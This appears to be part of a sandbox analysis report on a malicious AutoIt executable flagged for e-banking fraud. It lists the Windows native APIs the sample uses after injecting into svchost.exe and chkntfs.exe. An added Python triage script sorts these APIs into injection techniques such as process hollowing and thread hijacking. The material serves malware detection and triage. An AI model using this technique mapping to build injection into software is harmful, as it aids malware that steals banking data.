                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EAED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00EAED6A
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00E9AA57
                Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00EC9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00EC9576

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.3995040974.0000000004620000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2629802419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630146597.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2630585568.0000000005750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3994023782.0000000000A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3993353772.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3995415844.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 1001-13.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: 1001-13.exe, 00000000.00000000.2130539743.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f2cdddb9-2
                Source: 1001-13.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4df41846-b
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042D0D3 NtClose,2_2_0042D0D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B60 NtClose,LdrInitializeThunk,2_2_03672B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03672DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03672C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk,2_2_036735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674340 NtSetContextThread,2_2_03674340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03674650 NtSuspendThread,2_2_03674650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BE0 NtQueryValueKey,2_2_03672BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BF0 NtAllocateVirtualMemory,2_2_03672BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672BA0 NtEnumerateValueKey,2_2_03672BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672B80 NtQueryInformationFile,2_2_03672B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AF0 NtWriteFile,2_2_03672AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AD0 NtReadFile,2_2_03672AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672AB0 NtWaitForSingleObject,2_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F60 NtCreateProcessEx, | 2_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F30 NtCreateSection, | 2_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FE0 NtCreateFile, | 2_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FA0 NtQuerySection, | 2_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FB0 NtResumeThread, | 2_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F90 NtProtectVirtualMemory, | 2_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E30 NtWriteVirtualMemory, | 2_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EE0 NtQueueApcThread, | 2_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EA0 NtAdjustPrivilegesToken, | 2_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E80 NtReadVirtualMemory, | 2_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D30 NtUnmapViewOfSection, | 2_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D00 NtSetInformationFile, | 2_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D10 NtMapViewOfSection, | 2_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DD0 NtDelayExecution, | 2_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DB0 NtEnumerateKey, | 2_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C60 NtCreateKey, | 2_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C00 NtQueryInformationProcess, | 2_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CF0 NtOpenProcess, | 2_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CC0 NtQueryVirtualMemory, | 2_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CA0 NtQueryInformationToken, | 2_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673010 NtOpenDirectoryObject, | 2_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673090 NtSetValueKey, | 2_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036739B0 NtGetContextThread, | 2_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D70 NtOpenThread, | 2_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D10 NtOpenProcessToken, | 2_2_03673D10
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C4650 NtSuspendThread,LdrInitializeThunk, | 8_2_048C4650
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C4340 NtSetContextThread,LdrInitializeThunk, | 8_2_048C4340
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2CA0 NtQueryInformationToken,LdrInitializeThunk, | 8_2_048C2CA0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2C60 NtCreateKey,LdrInitializeThunk, | 8_2_048C2C60
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2C70 NtFreeVirtualMemory,LdrInitializeThunk, | 8_2_048C2C70
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2DD0 NtDelayExecution,LdrInitializeThunk, | 8_2_048C2DD0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2DF0 NtQuerySystemInformation,LdrInitializeThunk, | 8_2_048C2DF0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2D10 NtMapViewOfSection,LdrInitializeThunk, | 8_2_048C2D10
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2D30 NtUnmapViewOfSection,LdrInitializeThunk, | 8_2_048C2D30
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2E80 NtReadVirtualMemory,LdrInitializeThunk, | 8_2_048C2E80
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2EE0 NtQueueApcThread,LdrInitializeThunk, | 8_2_048C2EE0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2FB0 NtResumeThread,LdrInitializeThunk, | 8_2_048C2FB0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2FE0 NtCreateFile,LdrInitializeThunk, | 8_2_048C2FE0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2F30 NtCreateSection,LdrInitializeThunk, | 8_2_048C2F30
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2AD0 NtReadFile,LdrInitializeThunk, | 8_2_048C2AD0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2AF0 NtWriteFile,LdrInitializeThunk, | 8_2_048C2AF0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2BA0 NtEnumerateValueKey,LdrInitializeThunk, | 8_2_048C2BA0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2BE0 NtQueryValueKey,LdrInitializeThunk, | 8_2_048C2BE0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk, | 8_2_048C2BF0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2B60 NtClose,LdrInitializeThunk, | 8_2_048C2B60
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C35C0 NtCreateMutant,LdrInitializeThunk, | 8_2_048C35C0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C39B0 NtGetContextThread,LdrInitializeThunk, | 8_2_048C39B0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2CC0 NtQueryVirtualMemory, | 8_2_048C2CC0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2CF0 NtOpenProcess, | 8_2_048C2CF0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2C00 NtQueryInformationProcess, | 8_2_048C2C00
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2DB0 NtEnumerateKey, | 8_2_048C2DB0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2D00 NtSetInformationFile, | 8_2_048C2D00
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2EA0 NtAdjustPrivilegesToken, | 8_2_048C2EA0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2E30 NtWriteVirtualMemory, | 8_2_048C2E30
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2F90 NtProtectVirtualMemory, | 8_2_048C2F90
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2FA0 NtQuerySection, | 8_2_048C2FA0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2F60 NtCreateProcessEx, | 8_2_048C2F60
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2AB0 NtWaitForSingleObject, | 8_2_048C2AB0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C2B80 NtQueryInformationFile, | 8_2_048C2B80
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C3090 NtSetValueKey, | 8_2_048C3090
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C3010 NtOpenDirectoryObject, | 8_2_048C3010
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C3D10 NtOpenProcessToken, | 8_2_048C3D10
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_048C3D70 NtOpenThread, | 8_2_048C3D70
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00599B80 NtCreateFile, | 8_2_00599B80
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00599CF0 NtReadFile, | 8_2_00599CF0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00599DE0 NtDeleteFile, | 8_2_00599DE0
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00599E80 NtClose, | 8_2_00599E80
Source: C:\Windows\SysWOW64\chkntfs.exe | Code function: 8_2_00599FE0 NtAllocateVirtualMemory, | 8_2_00599FE0
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9D5EB: CreateFileW,DeviceIoControl,CloseHandle, | 0_2_00E9D5EB
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E91201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_00E91201
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E9E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 0_2_00E9E8F6
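The native-API rows above are the security-relevant part of this listing. svchost.exe and chkntfs.exe both resolve NtCreateSection/NtMapViewOfSection/NtUnmapViewOfSection, NtOpenProcess/NtWriteVirtualMemory, NtQueueApcThread, NtGetContextThread/NtSetContextThread/NtSuspendThread/NtResumeThread and NtDelayExecution, which together cover every common user-mode injection primitive plus sleep-based evasion. They also resolve them at addresses that differ by a constant (for example 8_2_048C2F60 minus 2_2_03672F60 is 0x01250000, and the same holds for every Nt stub in the 048Cxxxx / 0367xxxx ranges), which is what one payload injected into two hosts looks like. The Python below is an added triage example, not code from Joe Sandbox or from this report: it parses rows in the report's "Code function" format, lists the Nt* APIs per process, matches them against a small primitive table, and computes the per-API address delta between the two processes. SAMPLE_ROWS is a constructed subset copied from the rows above; ROW_RE, the PRIMITIVES grouping and its names are the editor's assumptions, not Joe Sandbox signatures.

```python
"""Triage the 'Code function' rows of a Joe Sandbox report (added example, not
Joe Sandbox code): which Nt* APIs each process resolves, which injection
primitives that set completes, and whether two processes hold the same code
at a rebased address."""
import re
from collections import Counter, defaultdict

# Constructed input: a subset of the rows above, copied verbatim. The last row
# is a 'String function' row with no API list and must be skipped.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F60 NtCreateProcessEx,2_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672F30 NtCreateSection,2_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FE0 NtCreateFile,2_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672FB0 NtResumeThread,2_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672E30 NtWriteVirtualMemory,2_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672EE0 NtQueueApcThread,2_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D30 NtUnmapViewOfSection,2_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672D10 NtMapViewOfSection,2_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672DD0 NtDelayExecution,2_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672CF0 NtOpenProcess,2_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036739B0 NtGetContextThread,2_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004017492_2_00401749
Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C4650 NtSuspendThread,LdrInitializeThunk,8_2_048C4650
Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C4340 NtSetContextThread,LdrInitializeThunk,8_2_048C4340
Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2FE0 NtCreateFile,LdrInitializeThunk,8_2_048C2FE0
Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2FB0 NtResumeThread,LdrInitializeThunk,8_2_048C2FB0
Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C39B0 NtGetContextThread,LdrInitializeThunk,8_2_048C39B0
Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_048C2F60 NtCreateProcessEx,8_2_048C2F60
Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 8_2_00599B80 NtCreateFile,8_2_00599B80
Source: C:\Users\user\Desktop\1001-13.exeCode function: 0_2_00E9D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00E9D5EB
Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 036AEA12 appears 86 times
"""
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
CHKNTFS = r"C:\Windows\SysWOW64\chkntfs.exe"

# Row layout: Source: <path>[ | ]Code function: <fid>[:] <Api1>,<Api2>,...[,][ | ]<fid>
# where <fid> is <process>_<run>_<hex address>; accepts the fused and the pipe-separated form.
ROW_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]{8}):?\s*"
    r"(?P<apis>[^|]*?),?\s*\|?\s*(?P=fid)\s*$"
)

# Editor's grouping of native APIs into primitives (assumption, not a Joe Sandbox signature).
PRIMITIVES = {
    "section mapping": {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "remote memory write": {"NtOpenProcess", "NtWriteVirtualMemory"},
    "APC injection": {"NtQueueApcThread", "NtResumeThread"},
    "thread context hijack": {"NtSuspendThread", "NtGetContextThread",
                              "NtSetContextThread", "NtResumeThread"},
    "process hollowing": {"NtCreateProcessEx", "NtUnmapViewOfSection", "NtResumeThread"},
    "sleep-based evasion": {"NtDelayExecution"},
}

def parse_rows(text):
    """One dict per 'Code function' row: source process, function id, address, API list."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        fid = m.group("fid")
        rows.append({"source": m.group("source"), "fid": fid,
                     "addr": int(fid.rsplit("_", 1)[1], 16),
                     "apis": [a for a in m.group("apis").split(",") if a]})
    return rows

def native_api_profile(rows):
    """Set of Nt*/Zw* APIs each source process resolves (empty set if none)."""
    profile = defaultdict(set)
    for r in rows:
        profile[r["source"]].update(a for a in r["apis"] if a.startswith(("Nt", "Zw")))
    return dict(profile)

def matched_primitives(apis):
    """Names of the primitives whose whole API set is present in `apis`."""
    return sorted(name for name, need in PRIMITIVES.items() if need <= apis)

def rebase_deltas(rows, src_a, src_b):
    """addr(src_b) - addr(src_a) for every Nt* stub resolved in both processes.
    One dominant delta means both processes hold the same code at a different base."""
    by_api = defaultdict(lambda: defaultdict(list))
    for r in rows:
        if r["apis"] and r["apis"][0].startswith(("Nt", "Zw")):
            by_api[r["apis"][0]][r["source"]].append(r["addr"])
    deltas = Counter()
    for per_src in by_api.values():
        for a in per_src.get(src_a, []):
            for b in per_src.get(src_b, []):
                deltas[b - a] += 1
    return deltas

if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for src, apis in native_api_profile(rows).items():
        print(f"{src}: {len(apis)} Nt APIs -> {matched_primitives(apis) or 'none'}")
    delta, hits = rebase_deltas(rows, SVCHOST, CHKNTFS).most_common(1)[0]
    print(f"dominant delta svchost.exe -> chkntfs.exe: 0x{delta:08X} ({hits} stubs agree)")
```

On this subset svchost.exe completes section mapping, remote memory write, APC injection, process hollowing and sleep-based evasion, chkntfs.exe completes thread context hijack, and the dominant delta is 0x01250000 supported by four stubs. The single outlier comes from chkntfs.exe's second NtCreateFile at 8_2_00599B80, which lies in a separate address range (8_2_0059xxxx) from the 048Cxxxx stubs and so does not share their base. Feed the full row list from the report into parse_rows to get the complete profile; the parser accepts the fused form extracted above and a pipe-separated form.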
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E38060 | 0_2_00E38060
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EA2046 | 0_2_00EA2046
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E98298 | 0_2_00E98298
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E6E4FF | 0_2_00E6E4FF
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E6676B | 0_2_00E6676B
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EC4873 | 0_2_00EC4873
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E3CAF0 | 0_2_00E3CAF0
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E5CAA0 | 0_2_00E5CAA0
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E4CC39 | 0_2_00E4CC39
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E66DD9 | 0_2_00E66DD9
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E4D063 | 0_2_00E4D063
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E391C0 | 0_2_00E391C0
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E4B119 | 0_2_00E4B119
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E51394 | 0_2_00E51394
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E5781B | 0_2_00E5781B
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E4997D | 0_2_00E4997D
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E37920 | 0_2_00E37920
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E57A4A | 0_2_00E57A4A
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E57CA7 | 0_2_00E57CA7
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00E69EEE | 0_2_00E69EEE
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_00EBBE44 | 0_2_00EBBE44
Source: C:\Users\user\Desktop\1001-13.exe | Code function: 0_2_0148A310 | 0_2_0148A310
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401749 | 2_2_00401749
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418FC3 | 2_2_00418FC3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410953 | 2_2_00410953
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401957 | 2_2_00401957
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401960 | 2_2_00401960
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E933 | 2_2_0040E933
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004171C3 | 2_2_004171C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004171BE | 2_2_004171BE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040EA78 | 2_2_0040EA78
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402AC0 | 2_2_00402AC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040EA83 | 2_2_0040EA83
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402ABD | 2_2_00402ABD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402670 | 2_2_00402670
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042F6B3 | 2_2_0042F6B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401760 | 2_2_00401760
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041072B | 2_2_0041072B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00410733 | 2_2_00410733
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402FD0 | 2_2_00402FD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA352 | 2_2_036FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 | 2_2_0364E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037003E6 | 2_2_037003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 | 2_2_036E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C02C0 | 2_2_036C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C8158 | 2_2_036C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630100 | 2_2_03630100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 | 2_2_036DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F81CC | 2_2_036F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F41A2 | 2_2_036F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037001AA | 2_2_037001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 | 2_2_036D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 | 2_2_03640770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664750 | 2_2_03664750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363C7C0 | 2_2_0363C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365C6E0 | 2_2_0365C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640535 | 2_2_03640535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03700591 | 2_2_03700591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F2446 | 2_2_036F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4420 | 2_2_036E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EE4F6 | 2_2_036EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FAB40 | 2_2_036FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F6BD7 | 2_2_036F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 | 2_2_0363EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 | 2_2_03656962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036429A0 | 2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370A9A6 | 2_2_0370A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364A840 | 2_2_0364A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03642840 | 2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E8F0 | 2_2_0366E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036268B8 | 2_2_036268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B4F40 | 2_2_036B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03682F28 | 2_2_03682F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660F30 | 2_2_03660F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E2F30 | 2_2_036E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364CFE0 | 2_2_0364CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632FC8 | 2_2_03632FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BEFA0 | 2_2_036BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640E59 | 2_2_03640E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEE26 | 2_2_036FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FEEDB | 2_2_036FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03652E90 | 2_2_03652E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FCE93 | 2_2_036FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364AD00 | 2_2_0364AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DCD1F | 2_2_036DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363ADE0 | 2_2_0363ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03658DBF | 2_2_03658DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640C00 | 2_2_03640C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630CF2 | 2_2_03630CF2
